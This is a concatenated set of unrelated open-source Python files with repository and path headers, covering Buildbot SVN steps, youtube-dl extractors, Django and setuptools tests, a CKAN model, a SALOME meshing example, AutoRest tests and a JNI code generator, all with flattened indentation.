cmd = ['update']
if self.revision:
cmd.extend(['--revision', str(self.revision)])
d.addCallback(lambda _: self._dovccmd(cmd))
return d
@defer.inlineCallbacks
def copy(self):
yield self.runRmdir(self.workdir)
# temporarily set workdir = 'source' and do an incremental checkout
try:
old_workdir = self.workdir
self.workdir = 'source'
yield self.incremental(None)
except: # finally doesn't work in python-2.4
self.workdir = old_workdir
raise
self.workdir = old_workdir
# if we're copying, copy; otherwise, export from source to build
if self.method == 'copy':
cmd = buildstep.RemoteCommand('cpdir',
{ 'fromdir': 'source', 'todir':self.workdir,
'logEnviron': self.logEnviron })
else:
export_cmd = ['svn', 'export']
if self.revision:
export_cmd.extend(["--revision", str(self.revision)])
export_cmd.extend(['source', self.workdir])
cmd = buildstep.RemoteShellCommand('', export_cmd,
env=self.env, logEnviron=self.logEnviron, timeout=self.timeout)
cmd.useLog(self.stdio_log, False)
yield self.runCommand(cmd)
if cmd.didFail():
raise buildstep.BuildStepFailed()
def finish(self, res):
d = defer.succeed(res)
def _gotResults(results):
self.setStatus(self.cmd, results)
return results
d.addCallback(_gotResults)
d.addCallbacks(self.finished, self.checkDisconnect)
return d
def _dovccmd(self, command, collectStdout=False):
assert command, "No command specified"
command.extend(['--non-interactive', '--no-auth-cache'])
if self.username:
command.extend(['--username', self.username])
if self.password:
command.extend(['--password', self.password])
if self.depth:
command.extend(['--depth', self.depth])
if self.extra_args:
command.extend(self.extra_args)
cmd = buildstep.RemoteShellCommand(self.workdir, ['svn'] + command,
env=self.env,
logEnviron=self.logEnviron,
timeout=self.timeout,
collectStdout=collectStdout)
cmd.useLog(self.stdio_log, False)
log.msg("Starting SVN command : svn %s" % (" ".join(command), ))
d = self.runCommand(cmd)
def evaluateCommand(cmd):
if cmd.didFail():
log.msg("Source step failed while running command %s" % cmd)
raise buildstep.BuildStepFailed()
if collectStdout:
return cmd.stdout
else:
return cmd.rc
d.addCallback(lambda _: evaluateCommand(cmd))
return d
def _getMethod(self):
if self.method is not None and self.mode != 'incremental':
return self.method
elif self.mode == 'incremental':
return None
elif self.method is None and self.mode == 'full':
return 'fresh'
@defer.inlineCallbacks
def _sourcedirIsUpdatable(self):
# first, perform a stat to ensure that this is really an svn directory
res = yield self.pathExists(self.build.path_module.join(self.workdir, '.svn'))
if not res:
defer.returnValue(False)
return
# then run 'svn info --xml' to check that the URL matches our repourl
stdout = yield self._dovccmd(['info', '--xml'], collectStdout=True)
try:
stdout_xml = xml.dom.minidom.parseString(stdout)
extractedurl = stdout_xml.getElementsByTagName('url')[0].firstChild.nodeValue
except xml.parsers.expat.ExpatError:
msg = "Corrupted xml, aborting step"
self.stdio_log.addHeader(msg)
raise buildstep.BuildStepFailed()
defer.returnValue(extractedurl == self.repourl)
return
@defer.inlineCallbacks
def parseGotRevision(self, _):
# if this was a full/export, then we need to check svnversion in the
# *source* directory, not the build directory
svnversion_dir = self.workdir
if self.mode == 'full' and self.method == 'export':
svnversion_dir = 'source'
cmd = buildstep.RemoteShellCommand(svnversion_dir, ['svn', 'info', '--xml'],
env=self.env,
logEnviron=self.logEnviron,
timeout=self.timeout,
collectStdout=True)
cmd.useLog(self.stdio_log, False)
yield self.runCommand(cmd)
stdout = cmd.stdout
try:
stdout_xml = xml.dom.minidom.parseString(stdout)
except xml.parsers.expat.ExpatError:
msg = "Corrupted xml, aborting step"
self.stdio_log.addHeader(msg)
raise buildstep.BuildStepFailed()
revision = None
if self.preferLastChangedRev:
try:
revision = stdout_xml.getElementsByTagName('commit')[0].attributes['revision'].value
except (KeyError, IndexError):
msg =("SVN.parseGotRevision unable to detect Last Changed Rev in"
" output of svn info")
log.msg(msg)
# fall through and try to get 'Revision' instead
if revision is None:
try:
revision = stdout_xml.getElementsByTagName('entry')[0].attributes['revision'].value
except (KeyError, IndexError):
msg =("SVN.parseGotRevision unable to detect revision in"
" output of svn info")
log.msg(msg)
raise buildstep.BuildStepFailed()
msg = "Got SVN revision %s" % (revision, )
self.stdio_log.addHeader(msg)
self.updateSourceProperty('got_revision', revision)
defer.returnValue(cmd.rc)
def purge(self, ignore_ignores):
"""Delete everything that shown up on status."""
command = ['status', '--xml']
if ignore_ignores:
command.append('--no-ignore')
d = self._dovccmd(command, collectStdout=True)
def parseAndRemove(stdout):
files = []
for filename in self.getUnversionedFiles(stdout, self.keep_on_purge):
filename = self.workdir+'/'+str(filename)
files.append(filename)
if len(files) == 0:
d = defer.succeed(0)
else:
if self.slaveVersionIsOlderThan('rmdir', '2.14'):
d = self.removeFiles(files)
else:
d = self.runRmdir(files, abandonOnFailure=False)
return d
d.addCallback(parseAndRemove)
def evaluateCommand(rc):
if rc != 0:
log.msg("Failed removing files")
raise buildstep.BuildStepFailed()
return rc
d.addCallback(evaluateCommand)
return d
@staticmethod
def getUnversionedFiles(xmlStr, keep_on_purge):
try:
result_xml = xml.dom.minidom.parseString(xmlStr)
except xml.parsers.expat.ExpatError:
log.err("Corrupted xml, aborting step")
raise buildstep.BuildStepFailed()
for entry in result_xml.getElementsByTagName('entry'):
(wc_status,) = entry.getElementsByTagName('wc-status')
if wc_status.getAttribute('item') == 'external':
continue
if wc_status.getAttribute('item') == 'missing':
continue
filename = entry.getAttribute('path')
if filename in keep_on_purge or filename == '':
continue
yield filename
@defer.inlineCallbacks
def removeFiles(self, files):
for filename in files:
res = yield self.runRmdir(filename, abandonOnFailure=False)
if res:
defer.returnValue(res)
return
defer.returnValue(0)
def checkSvn(self):
cmd = buildstep.RemoteShellCommand(self.workdir, ['svn', '--version'],
env=self.env,
logEnviron=self.logEnviron,
timeout=self.timeout)
cmd.useLog(self.stdio_log, False)
d = self.runCommand(cmd)
def evaluate(cmd):
if cmd.rc != 0:
return False
return True
d.addCallback(lambda _: evaluate(cmd))
return d
def computeSourceRevision(self, changes):
if not changes or None in [c.revision for c in changes]:
return None
lastChange = max([int(c.revision) for c in changes])
return lastChange
|
lanen/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/screenwavemedia.py
|
58
|
# encoding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
int_or_none,
unified_strdate,
js_to_json,
)
class ScreenwaveMediaIE(InfoExtractor):
_VALID_URL = r'https?://player\d?\.screenwavemedia\.com/(?:play/)?[a-zA-Z]+\.php\?.*\bid=(?P<id>[A-Za-z0-9-]+)'
EMBED_PATTERN = r'src=(["\'])(?P<url>(?:https?:)?//player\d?\.screenwavemedia\.com/(?:play/)?[a-zA-Z]+\.php\?.*\bid=.+?)\1'
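# Hedged usage sketch (not part of this extractor; names are illustrative): embedding
# sites are typically handled by other extractors with something like
#   mobj = re.search(ScreenwaveMediaIE.EMBED_PATTERN, webpage)
#   if mobj:
#       return self.url_result(mobj.group('url'))
# where `webpage` is the HTML of the page that embeds the player.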
_TESTS = [{
'url': 'http://player.screenwavemedia.com/play/play.php?playerdiv=videoarea&companiondiv=squareAd&id=Cinemassacre-19911',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
playerdata = self._download_webpage(
'http://player.screenwavemedia.com/player.php?id=%s' % video_id,
video_id, 'Downloading player webpage')
vidtitle = self._search_regex(
r'\'vidtitle\'\s*:\s*"([^"]+)"', playerdata, 'vidtitle').replace('\\/', '/')
playerconfig = self._download_webpage(
'http://player.screenwavemedia.com/player.js',
video_id, 'Downloading playerconfig webpage')
videoserver = self._search_regex(r'SWMServer\s*=\s*"([\d\.]+)"', playerdata, 'videoserver')
sources = self._parse_json(
js_to_json(
re.sub(
r'(?s)/\*.*?\*/', '',
self._search_regex(
r"sources\s*:\s*(\[[^\]]+?\])", playerconfig,
'sources',
).replace(
"' + thisObj.options.videoserver + '",
videoserver
).replace(
"' + playerVidId + '",
video_id
)
)
),
video_id, fatal=False
)
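# Hedged illustration of the cleanup above (the player.js fragment is assumed, not
# quoted from the site): an entry roughly like
#   {file: 'http://' + thisObj.options.videoserver + '/vod/' + playerVidId + '_high.mp4', label: '360p High'}
# has the videoserver and video id placeholders substituted, any /* ... */ comments
# stripped, and is then converted by js_to_json() so _parse_json() can load it into
# the `sources` list used below.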
# Fallback to hardcoded sources if JS changes again
if not sources:
self.report_warning('Falling back to a hardcoded list of streams')
sources = [{
'file': 'http://%s/vod/%s_%s.mp4' % (videoserver, video_id, format_id),
'type': 'mp4',
'label': format_label,
} for format_id, format_label in (
('low', '144p Low'), ('med', '160p Med'), ('high', '360p High'), ('hd1', '720p HD1'))]
sources.append({
'file': 'http://%s/vod/smil:%s.smil/playlist.m3u8' % (videoserver, video_id),
'type': 'hls',
})
formats = []
for source in sources:
if source['type'] == 'hls':
formats.extend(self._extract_m3u8_formats(source['file'], video_id))
else:
file_ = source.get('file')
if not file_:
continue
format_label = source.get('label')
format_id = self._search_regex(
r'_(.+?)\.[^.]+$', file_, 'format id', default=None)
height = int_or_none(self._search_regex(
r'^(\d+)[pP]', format_label, 'height', default=None))
formats.append({
'url': source['file'],
'format_id': format_id,
'format': format_label,
'ext': source.get('type'),
'height': height,
})
self._sort_formats(formats)
return {
'id': video_id,
'title': vidtitle,
'formats': formats,
}
class TeamFourIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?teamfourstar\.com/video/(?P<id>[a-z0-9\-]+)/?'
_TEST = {
'url': 'http://teamfourstar.com/video/a-moment-with-tfs-episode-4/',
'info_dict': {
'id': 'TeamFourStar-5292a02f20bfa',
'ext': 'mp4',
'upload_date': '20130401',
'description': 'Check out this and more on our website: http://teamfourstar.com\nTFS Store: http://sharkrobot.com/team-four-star\nFollow on Twitter: http://twitter.com/teamfourstar\nLike on FB: http://facebook.com/teamfourstar',
'title': 'A Moment With TFS Episode 4',
}
}
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
playerdata_url = self._search_regex(
r'src="(http://player\d?\.screenwavemedia\.com/(?:play/)?[a-zA-Z]+\.php\?[^"]*\bid=.+?)"',
webpage, 'player data URL')
video_title = self._html_search_regex(
r'<div class="heroheadingtitle">(?P<title>.+?)</div>',
webpage, 'title')
video_date = unified_strdate(self._html_search_regex(
r'<div class="heroheadingdate">(?P<date>.+?)</div>',
webpage, 'date', fatal=False))
video_description = self._html_search_regex(
r'(?s)<div class="postcontent">(?P<description>.+?)</div>',
webpage, 'description', fatal=False)
video_thumbnail = self._og_search_thumbnail(webpage)
return {
'_type': 'url_transparent',
'display_id': display_id,
'title': video_title,
'description': video_description,
'upload_date': video_date,
'thumbnail': video_thumbnail,
'url': playerdata_url,
}
|
anhstudios/swganh
|
refs/heads/develop
|
data/scripts/templates/object/tangible/hair/bothan/shared_hair_bothan_female_s04.py
|
2
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/hair/bothan/shared_hair_bothan_female_s04.iff"
result.attribute_template_id = -1
result.stfName("hair_name","hair")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
margelatu/czl-scrape
|
refs/heads/master
|
scrapy/czlscrape/spiders/__init__.py
|
2415
|
# This package will contain the spiders of your Scrapy project
#
# Please refer to the documentation for information on how to create and manage
# your spiders.
|
drpaneas/linuxed.gr
|
refs/heads/master
|
lib/python2.7/site-packages/setuptools/tests/test_test.py
|
124
|
# -*- coding: UTF-8 -*-
"""develop tests
"""
import os
import shutil
import site
import sys
import tempfile
import unittest
from distutils.errors import DistutilsError
from setuptools.compat import StringIO
from setuptools.command.test import test
from setuptools.command import easy_install as easy_install_pkg
from setuptools.dist import Distribution
SETUP_PY = """\
from setuptools import setup
setup(name='foo',
packages=['name', 'name.space', 'name.space.tests'],
namespace_packages=['name'],
test_suite='name.space.tests.test_suite',
)
"""
NS_INIT = """# -*- coding: Latin-1 -*-
# Söme Arbiträry Ünicode to test Issüé 310
try:
__import__('pkg_resources').declare_namespace(__name__)
except ImportError:
from pkgutil import extend_path
__path__ = extend_path(__path__, __name__)
"""
# Make sure this is Latin-1 binary, before writing:
if sys.version_info < (3,):
NS_INIT = NS_INIT.decode('UTF-8')
NS_INIT = NS_INIT.encode('Latin-1')
TEST_PY = """import unittest
class TestTest(unittest.TestCase):
def test_test(self):
print "Foo" # Should fail under Python 3 unless 2to3 is used
test_suite = unittest.makeSuite(TestTest)
"""
class TestTestTest(unittest.TestCase):
def setUp(self):
if sys.version < "2.6" or hasattr(sys, 'real_prefix'):
return
# Directory structure
self.dir = tempfile.mkdtemp()
os.mkdir(os.path.join(self.dir, 'name'))
os.mkdir(os.path.join(self.dir, 'name', 'space'))
os.mkdir(os.path.join(self.dir, 'name', 'space', 'tests'))
# setup.py
setup = os.path.join(self.dir, 'setup.py')
f = open(setup, 'wt')
f.write(SETUP_PY)
f.close()
self.old_cwd = os.getcwd()
# name/__init__.py
init = os.path.join(self.dir, 'name', '__init__.py')
f = open(init, 'wb')
f.write(NS_INIT)
f.close()
# name/space/__init__.py
init = os.path.join(self.dir, 'name', 'space', '__init__.py')
f = open(init, 'wt')
f.write('#empty\n')
f.close()
# name/space/tests/__init__.py
init = os.path.join(self.dir, 'name', 'space', 'tests', '__init__.py')
f = open(init, 'wt')
f.write(TEST_PY)
f.close()
os.chdir(self.dir)
self.old_base = site.USER_BASE
site.USER_BASE = tempfile.mkdtemp()
self.old_site = site.USER_SITE
site.USER_SITE = tempfile.mkdtemp()
def tearDown(self):
if sys.version < "2.6" or hasattr(sys, 'real_prefix'):
return
os.chdir(self.old_cwd)
shutil.rmtree(self.dir)
shutil.rmtree(site.USER_BASE)
shutil.rmtree(site.USER_SITE)
site.USER_BASE = self.old_base
site.USER_SITE = self.old_site
def test_test(self):
if sys.version < "2.6" or hasattr(sys, 'real_prefix'):
return
dist = Distribution(dict(
name='foo',
packages=['name', 'name.space', 'name.space.tests'],
namespace_packages=['name'],
test_suite='name.space.tests.test_suite',
use_2to3=True,
))
dist.script_name = 'setup.py'
cmd = test(dist)
cmd.user = 1
cmd.ensure_finalized()
cmd.install_dir = site.USER_SITE
cmd.user = 1
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
try: # try/except/finally doesn't work in Python 2.4, so we need nested try-statements.
cmd.run()
except SystemExit: # The test runner calls sys.exit, stop that making an error.
pass
finally:
sys.stdout = old_stdout
|
poiati/django
|
refs/heads/master
|
tests/messages_tests/test_mixins.py
|
281
|
from django.core.urlresolvers import reverse
from django.test import SimpleTestCase, override_settings
from .urls import ContactFormViewWithMsg
@override_settings(ROOT_URLCONF='messages_tests.urls')
class SuccessMessageMixinTests(SimpleTestCase):
def test_set_messages_success(self):
author = {'name': 'John Doe',
'slug': 'success-msg'}
add_url = reverse('add_success_msg')
req = self.client.post(add_url, author)
self.assertIn(ContactFormViewWithMsg.success_message % author,
req.cookies['messages'].value)
|
blueburningcoder/nupic
|
refs/heads/master
|
external/linux32/lib/python2.6/site-packages/matplotlib/numerix/linear_algebra/__init__.py
|
70
|
from matplotlib.numerix import which
if which[0] == "numarray":
from numarray.linear_algebra import *
elif which[0] == "numeric":
from LinearAlgebra import *
elif which[0] == "numpy":
try:
from numpy.oldnumeric.linear_algebra import *
except ImportError:
from numpy.linalg.old import *
else:
raise RuntimeError("invalid numerix selector")
|
redhat-openstack/django
|
refs/heads/epel7-patches
|
django/contrib/gis/db/backends/spatialite/introspection.py
|
221
|
from django.contrib.gis.gdal import OGRGeomType
from django.db.backends.sqlite3.introspection import DatabaseIntrospection, FlexibleFieldLookupDict
from django.utils import six
class GeoFlexibleFieldLookupDict(FlexibleFieldLookupDict):
"""
Subclass that updates the `base_data_types_reverse` dict
for geometry field types.
"""
base_data_types_reverse = FlexibleFieldLookupDict.base_data_types_reverse.copy()
base_data_types_reverse.update(
{'point' : 'GeometryField',
'linestring' : 'GeometryField',
'polygon' : 'GeometryField',
'multipoint' : 'GeometryField',
'multilinestring' : 'GeometryField',
'multipolygon' : 'GeometryField',
'geometrycollection' : 'GeometryField',
})
class SpatiaLiteIntrospection(DatabaseIntrospection):
data_types_reverse = GeoFlexibleFieldLookupDict()
def get_geometry_type(self, table_name, geo_col):
cursor = self.connection.cursor()
try:
# Querying the `geometry_columns` table to get additional metadata.
cursor.execute('SELECT "coord_dimension", "srid", "type" '
'FROM "geometry_columns" '
'WHERE "f_table_name"=%s AND "f_geometry_column"=%s',
(table_name, geo_col))
row = cursor.fetchone()
if not row:
raise Exception('Could not find a geometry column for "%s"."%s"' %
(table_name, geo_col))
# OGRGeomType does not require GDAL and makes it easy to convert
# from OGC geom type name to Django field.
field_type = OGRGeomType(row[2]).django
# Getting any GeometryField keyword arguments that are not the default.
dim = row[0]
srid = row[1]
field_params = {}
if srid != 4326:
field_params['srid'] = srid
if isinstance(dim, six.string_types) and 'Z' in dim:
field_params['dim'] = 3
finally:
cursor.close()
return field_type, field_params
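# Hedged example of the conversion above (values are illustrative): a
# geometry_columns row ('2', 32140, 'POLYGON') maps to
#   OGRGeomType('POLYGON').django -> 'PolygonField'
# with field_params {'srid': 32140}; an SRID of 4326 and a 2D column add no kwargs.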
|
datacats/ckanext-featuredviews
|
refs/heads/master
|
ckanext/featuredviews/db.py
|
3
|
import ckan.model as model
from sqlalchemy import Table
from sqlalchemy import Column
from sqlalchemy import types
from ckan.model.meta import metadata, mapper, Session
from ckan.model.types import make_uuid
featured_table = Table('featured', metadata,
Column('resource_view_id', types.UnicodeText, primary_key=True),
Column('package_id', types.UnicodeText),
Column('canonical', types.Boolean),
Column('homepage', types.Boolean)
)
class Featured(model.DomainObject):
@classmethod
def get(cls, **kw):
query = model.Session.query(cls).autoflush(False)
return query.filter_by(**kw).first()
@classmethod
def find(cls, **kw):
query = model.Session.query(cls).autoflush(False)
return query.filter_by(**kw)
model.meta.mapper(Featured, featured_table)
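# Hedged usage sketch (assumes the 'featured' table has already been created by the
# plugin's setup code, which is not shown here; `view_id` and `pkg_id` are placeholders):
#   featured = Featured.get(resource_view_id=view_id)
#   if featured is None:
#       featured = Featured(resource_view_id=view_id, package_id=pkg_id,
#                           canonical=False, homepage=True)
#       model.Session.add(featured)
#       model.Session.commit()
#   homepage_views = Featured.find(homepage=True).all()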
|
FedoraScientific/salome-smesh
|
refs/heads/master
|
doc/salome/examples/defining_hypotheses_ex11.py
|
1
|
# Projection 1D2D
# Project triangles from one meshed face to another mesh on the same box
import salome
salome.salome_init()
import GEOM
from salome.geom import geomBuilder
geompy = geomBuilder.New(salome.myStudy)
import SMESH, SALOMEDS
from salome.smesh import smeshBuilder
smesh = smeshBuilder.New(salome.myStudy)
# Prepare geometry
# Create a box
box = geompy.MakeBoxDXDYDZ(100, 100, 100)
# Get geom faces to mesh with triangles in the 1st and 2nd meshes
faces = geompy.SubShapeAll(box, geompy.ShapeType["FACE"])
# 2 adjacent faces of the box
Face_1 = faces[2]
Face_2 = faces[0]
geompy.addToStudy( box, 'box' )
geompy.addToStudyInFather( box, Face_1, 'Face_1' )
geompy.addToStudyInFather( box, Face_2, 'Face_2' )
# Make the source mesh with Netgen 2D
src_mesh = smesh.Mesh(Face_1, "Source mesh")
src_mesh.Segment().NumberOfSegments(15)
src_mesh.Triangle()
src_mesh.Compute()
# Mesh the target mesh using the Projection1D2D algorithm
tgt_mesh = smesh.Mesh(Face_2, "Target mesh")
tgt_mesh.Projection1D2D().SourceFace(Face_1,src_mesh)
tgt_mesh.Compute()
|
tbombach/autorest
|
refs/heads/master
|
src/generator/AutoRest.Python.Tests/AcceptanceTests/string_tests.py
|
2
|
# coding=utf-8
# --------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
# --------------------------------------------------------------------------
import unittest
import subprocess
import sys
import isodate
import tempfile
import json
from datetime import date, datetime, timedelta
import os
from os.path import dirname, pardir, join, realpath, sep, pardir
cwd = dirname(realpath(__file__))
root = realpath(join(cwd , pardir, pardir, pardir, pardir))
sys.path.append(join(root, "src" , "client" , "Python", "msrest"))
log_level = int(os.environ.get('PythonLogLevel', 30))
tests = realpath(join(cwd, pardir, "Expected", "AcceptanceTests"))
sys.path.append(join(tests, "BodyString"))
from msrest.serialization import Deserializer
from msrest.exceptions import DeserializationError, SerializationError
from autorestswaggerbatservice import AutoRestSwaggerBATService
from autorestswaggerbatservice.models.auto_rest_swagger_bat_service_enums import *
class StringTests(unittest.TestCase):
def test_string(self):
client = AutoRestSwaggerBATService(base_url="http://localhost:3000")
self.assertIsNone(client.string.get_null())
client.string.put_null(None)
self.assertEqual("", client.string.get_empty())
client.string.put_empty("")
try:
test_str = (
"\xe5\x95\x8a\xe9\xbd\x84\xe4\xb8\x82\xe7\x8b\x9b\xe7\x8b"
"\x9c\xef\xa7\xb1\xef\xa4\xac\xef\xa7\xb1\xef\xa8\x8c\xef"
"\xa8\xa9\xcb\x8a\xe3\x80\x9e\xe3\x80\xa1\xef\xbf\xa4\xe2"
"\x84\xa1\xe3\x88\xb1\xe2\x80\x90\xe3\x83\xbc\xef\xb9\xa1"
"\xef\xb9\xa2\xef\xb9\xab\xe3\x80\x81\xe3\x80\x93\xe2\x85"
"\xb0\xe2\x85\xb9\xe2\x92\x88\xe2\x82\xac\xe3\x88\xa0\xe3"
"\x88\xa9\xe2\x85\xa0\xe2\x85\xab\xef\xbc\x81\xef\xbf\xa3"
"\xe3\x81\x81\xe3\x82\x93\xe3\x82\xa1\xe3\x83\xb6\xce\x91"
"\xef\xb8\xb4\xd0\x90\xd0\xaf\xd0\xb0\xd1\x8f\xc4\x81\xc9"
"\xa1\xe3\x84\x85\xe3\x84\xa9\xe2\x94\x80\xe2\x95\x8b\xef"
"\xb8\xb5\xef\xb9\x84\xef\xb8\xbb\xef\xb8\xb1\xef\xb8\xb3"
"\xef\xb8\xb4\xe2\x85\xb0\xe2\x85\xb9\xc9\x91\xee\x9f\x87"
"\xc9\xa1\xe3\x80\x87\xe3\x80\xbe\xe2\xbf\xbb\xe2\xba\x81"
"\xee\xa1\x83\xe4\x9c\xa3\xee\xa1\xa4\xe2\x82\xac").decode('utf-8')
except AttributeError:
test_str = (
b"\xe5\x95\x8a\xe9\xbd\x84\xe4\xb8\x82\xe7\x8b\x9b\xe7\x8b"
b"\x9c\xef\xa7\xb1\xef\xa4\xac\xef\xa7\xb1\xef\xa8\x8c\xef"
b"\xa8\xa9\xcb\x8a\xe3\x80\x9e\xe3\x80\xa1\xef\xbf\xa4\xe2"
b"\x84\xa1\xe3\x88\xb1\xe2\x80\x90\xe3\x83\xbc\xef\xb9\xa1"
b"\xef\xb9\xa2\xef\xb9\xab\xe3\x80\x81\xe3\x80\x93\xe2\x85"
b"\xb0\xe2\x85\xb9\xe2\x92\x88\xe2\x82\xac\xe3\x88\xa0\xe3"
b"\x88\xa9\xe2\x85\xa0\xe2\x85\xab\xef\xbc\x81\xef\xbf\xa3"
b"\xe3\x81\x81\xe3\x82\x93\xe3\x82\xa1\xe3\x83\xb6\xce\x91"
b"\xef\xb8\xb4\xd0\x90\xd0\xaf\xd0\xb0\xd1\x8f\xc4\x81\xc9"
b"\xa1\xe3\x84\x85\xe3\x84\xa9\xe2\x94\x80\xe2\x95\x8b\xef"
b"\xb8\xb5\xef\xb9\x84\xef\xb8\xbb\xef\xb8\xb1\xef\xb8\xb3"
b"\xef\xb8\xb4\xe2\x85\xb0\xe2\x85\xb9\xc9\x91\xee\x9f\x87"
b"\xc9\xa1\xe3\x80\x87\xe3\x80\xbe\xe2\xbf\xbb\xe2\xba\x81"
b"\xee\xa1\x83\xe4\x9c\xa3\xee\xa1\xa4\xe2\x82\xac").decode('utf-8')
self.assertEqual(test_str, client.string.get_mbcs())
client.string.put_mbcs(test_str)
test_str = " Now is the time for all good men to come to the aid of their country "
self.assertEqual(test_str, client.string.get_whitespace())
client.string.put_whitespace(test_str)
self.assertIsNone(client.string.get_not_provided())
self.assertEqual(Colors.redcolor, client.enum.get_not_expandable())
client.enum.put_not_expandable('red color')
client.enum.put_not_expandable(Colors.redcolor)
with self.assertRaises(SerializationError):
client.enum.put_not_expandable('not a colour')
self.assertEqual(client.string.get_base64_encoded(), 'a string that gets encoded with base64'.encode())
self.assertEqual(client.string.get_base64_url_encoded(), 'a string that gets encoded with base64url'.encode())
self.assertIsNone(client.string.get_null_base64_url_encoded())
client.string.put_base64_url_encoded('a string that gets encoded with base64url'.encode())
client.enum.put_referenced(Colors.redcolor)
client.enum.put_referenced("red color")
client.enum.put_referenced_constant()
self.assertEqual(client.enum.get_referenced(), Colors.redcolor)
self.assertEqual(client.enum.get_referenced_constant().color_constant, Colors.green_color.value)
if __name__ == '__main__':
unittest.main()
|
stefhak/openwebrtc
|
refs/heads/master
|
bindings/java/c_generator.py
|
31
|
# Copyright (c) 2014-2015, Ericsson AB. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
import config
from functools import partial
from collections import defaultdict
from itertools import imap
from java_type_signatures import type_signatures
from base_generator import *
C = BaseGenerator(
default_line_prefix=config.C_INDENTATION,
)
def jni_param(param):
if param.jni_type:
return param.jni_type + ' ' + param.jni_name
return ()
def c_param(param):
if param.c_type:
return param.c_type + ' ' + param.c_name
return ()
def c_arg(param):
if param.c_type:
return param.c_name
return ()
def jni_arg(param):
if param.jni_type:
return param.jni_name
return ()
@add_to(C)
class Log(C.Lines):
def __init__(self, level, msg, *args):
self.msg = msg
self.args = args
self.level = level
def _make_logfunc(level):
@classmethod
def logfunc(cls, msg, *args):
return cls(level, msg, *args)
return logfunc
error = _make_logfunc('error')
warning = _make_logfunc('warning')
debug = _make_logfunc('debug')
info = _make_logfunc('info')
verbose = _make_logfunc('verbose')
def __iter__(self):
yield C.Call('log_' + self.level, quot(self.msg), *self.args)
@add_to(C)
class Assert(C.Lines):
def __init__(self, val):
self.val = val
def __iter__(self):
yield semi('g_assert(' + flatjoin(self.val, '') + ')')
@add_to(C)
class Throw(C.Lines):
def __init__(self, *args):
self.args = args
def __iter__(self):
yield 'THROW(' + flatjoin(self.args, '') + ');'
@add_to(C)
class ExceptionCheck(C.Lines):
def __init__(self, value):
self.value = value
def __iter__(self):
yield C.If(C.Env('ExceptionCheck'),
C.Log('warning', 'exception at %s:%d', '__FILE__', '__LINE__'),
C.Env('ExceptionDescribe'),
C.Return(self.value),
)
@classmethod
def default(cls, value):
return cls(value.parent.return_value.default_value)
@add_to(C)
class CommentHeader(C.Comment):
def __iter__(self):
l = len(self.text)
yield '/**' + l * '*' + '**/'
yield '/* ' + self.text + ' */'
yield '/**' + l * '*' + '**/'
@add_to(C)
class Function(C.FunctionBlock):
modifiers = ['static']
def __init__(self,
name,
return_type='void',
params=None,
**kwargs):
super(Function, self).__init__(**kwargs)
self.name = name
self.return_type = return_type
self.params = params or []
@property
def start(self):
return [self.definition, '{']
@staticmethod
def callback(callback, body=None, **kwargs):
args = {
'return_type': callback.params.return_value.c_type,
'name': 'callback_' + callback.value.gir_type,
'params': map(c_param, callback.params),
'body': [TypeConversions.params_to_jni(callback.params, body=body or [], push_frame=True)],
}
if callback.params.return_value.name is not None:
args['body'] += [C.Return(callback.params.return_value.c_name)]
args.update(kwargs)
return C.Function(**args)
@add_to(C)
class JniExport(C.FunctionBlock):
modifiers = ['JNIEXPORT']
def __init__(self,
package=None,
clazz=None,
subclass=None,
method_name=None,
return_type='void',
params=None,
**kwargs):
super(JniExport, self).__init__(**kwargs)
self.package = package
self.clazz = clazz
